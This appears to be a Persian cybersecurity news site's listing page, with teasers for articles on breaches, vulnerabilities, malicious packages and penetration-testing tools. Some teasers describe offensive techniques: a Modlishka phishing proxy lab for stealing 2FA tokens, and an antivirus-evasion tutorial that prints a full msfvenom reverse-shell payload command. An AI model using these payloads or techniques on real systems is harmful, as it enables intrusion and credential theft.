یییی اسلاید
-
Bluetooth 6.1 با تصادفیسازی زمانبندی RPA، حریم خصوصی را بهبود میبخشد.
گروه تخصصی بلوتوث (Bluetooth SIG) بهتازگی از انتشار نسخه ۶.۱ مشخصات هستهای Bluetooth خبر داده است؛ نسخهای که با بهبودهای قابل توجه، بهویژه در زمینه افزایش حریم خصوصی کاربران، همراه شده است. یکی از ویژگیهای برجسته این نسخه، افزایش سطح حریم خصوصی دستگاهها از طریق بهروزرسانی تصادفی آدرسهای خصوصی قابل حل (Resolvable Private Address – RPA) است. این قابلیت با…
بیشتر بخوانید » -
هکرهای چینی پشت حملات هدفمند به سرورهای SAP NetWeaver قرار دارند.
محققان امنیتی آزمایشگاه Forescout Vedere حملات جاری را که آسیبپذیری با بیشترین درجه خطر را در نمونههای SAP NetWeaver هدف قرار داده است، به یک عامل تهدید چینی مرتبط دانستهاند. شرکت SAP در تاریخ ۲۴ آوریل یک به روزرسانی اضطراری خارج از برنامه برای رفع این نقص امنیتی «آپلود فایل بدون احراز هویت» (شناسایی شده با شناسه CVE-2025-31324) در SAP…
بیشتر بخوانید » -
اجرای حملات فیشینگ از طریق پروکسی معکوس HTTP با بهرهگیری از ابزار Modlishka
این آزمایشگاه نشان میدهد چگونه میتوان یک پروکسی معکوس HTTP بهنام Modlishka راهاندازی کرد که در کارزارهای فیشینگ برای سرقت گذرواژهها و توکنهای احراز هویت دومرحلهای (۲FA) کاربران مورد استفاده قرار میگیرد. ابزار Modlishka این امکان را فراهم میسازد، زیرا بهعنوان یک عامل مرد میانی (MITM) میان کاربر قربانی و وبسایتی که مهاجم در حال جعل هویت آن است قرار…
بیشتر بخوانید » -
راه اندازی سرورهای واسط و انتقالدهنده ایمیل SMTP Forwarders / Relays
راهاندازی سرور Relay Mail Server قرار است یک سرور ایمیل راهاندازی کنیم که در ادامه، بهعنوان یک سرور SMTP relay مورد استفاده قرار خواهد گرفت. در اولین گام، یک droplet (سرور مجازی) جدید با سیستمعامل Ubuntu در پلتفرم DigitalOcean ایجاد شد. نصب Postfix بهعنوان MTA روی droplet apt-get install postfix در طول نصب Postfix، دامنهی nodspot.com را بهعنوان نام ایمیل…
بیشتر بخوانید » -
یک پکیج مخرب PyPi بدافزار RAT را پنهان کرده و از سال ۲۰۲۲ توسعهدهندگان Discord را هدف قرار داده است.
یک بسته پایتون مخرب که توسعهدهندگان دیسکورد را هدف قرار میدهد و حاوی بدافزار RAT (تروجان دسترسی از راه دور) است، پس از بیش از سه سال در شاخص بسته پایتون (PyPI) مشاهده شد. بستهای به نام ‘discordpydebug’ که خود را به عنوان ابزاری برای ثبت خطاهای توسعهدهندگان رباتهای دیسکورد معرفی میکرد، از زمان بارگذاری آن در تاریخ ۲۱ مارس…
بیشتر بخوانید » -
شرکت Ascension اعلام کرد که نفوذ اطلاعاتی اخیر، بیش از ۴۳۰ هزار بیمار را تحت تأثیر قرار داده است.
شرکت Ascension، یکی از بزرگترین سامانههای خصوصی خدمات درمانی در ایالات متحده، اعلام کرده است که اطلاعات شخصی و درمانی بیش از ۴۳۰ هزار بیمار در جریان یک نقض داده که ماه گذشته فاش شد، در معرض افشا قرار گرفته است. براساس آنچه شرکت Ascension در نامههای اطلاعرسانی مربوط به نقض دادهها که در ماه آوریل برای افراد آسیبدیده ارسال…
بیشتر بخوانید » -
روشهای عبور از آنتیویروس با بهرهگیری از قالبهای آماده Metasploit و ساخت فایلهای اجرایی سفارشی
در اینجا نگاهی سریع داریم به چند روش ساده برای عبور از شناسایی آنتیویروسها هنگام استفاده از شلکدها. ۴۸ مورد شناسایی از بین ۶۸ آنتیویروس برای تست اولیه، یک پیلود Reverse Shell استاندارد با استفاده از Metasploit برای سیستمهای ۳۲ بیتی ویندوز تولید میکنیم. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f exe > /root/tools/av.exe با بررسی این فایل در سرویس VirusTotal،…
بیشتر بخوانید » -
Google Chrome از هوش مصنوعی داخلی دستگاه برای شناسایی کلاهبرداریهای پشتیبانی فنی استفاده خواهد کرد
Google در حال افزودن یک قابلیت امنیتی جدید به مرورگر Chrome است که با استفاده از مدل زبانی بزرگ داخلی موسوم به ‘Gemini Nano’، کلاهبرداریهای پشتیبانی فنی را هنگام وبگردی شناسایی و مسدود میکند. کلاهبرداریهای پشتیبانی فنی، وبسایتهای مخربی هستند که کاربران را فریب میدهند تا تصور کنند رایانهشان به ویروس آلوده شده یا دچار مشکلی دیگر است. این هشدارها…
بیشتر بخوانید » -
هکرهای گروه Luna Moth با جعل هویت تیم پشتیبانی فناوری اطلاعات، به شرکتهای آمریکایی حمله کرده و اقدام به اخاذی میکنند.
گروه هکری Luna Moth، که با نام Silent Ransom Group نیز شناخته میشود، حملات فیشینگ از نوع تماس تلفنی را علیه شرکتهای حقوقی و مالی در آمریکا افزایش داده است. گروه هکری Luna Moth، معروف به Silent Ransom Group، پیشتر با اجرای کمپینهای BazarCall موفق به نفوذ اولیه به شبکه شرکتها شده و پس از آن، باجافزارهای Ryuk و Conti…
بیشتر بخوانید » -
آموزش جامع ابزار Feroxbuster
Feroxbusterیک ابزار قدرتمند است که برای شناسایی دایرکتوریها (پوشهها) و فایلها روی سرورهای وب با استفاده از تکنیکهای حمله Brute-force طراحی شده است. این ابزار معمولاً در تست نفوذ و ارزیابیهای امنیتی برای شناسایی مسیرها و منابع پنهانشده مورد استفاده قرار میگیرد. در اینجا قصد داریم درباره وظایف و کارهای مختلفی که با استفاده از Feroxbuster میتوان انجام داد، صحبت…
بیشتر بخوانید »
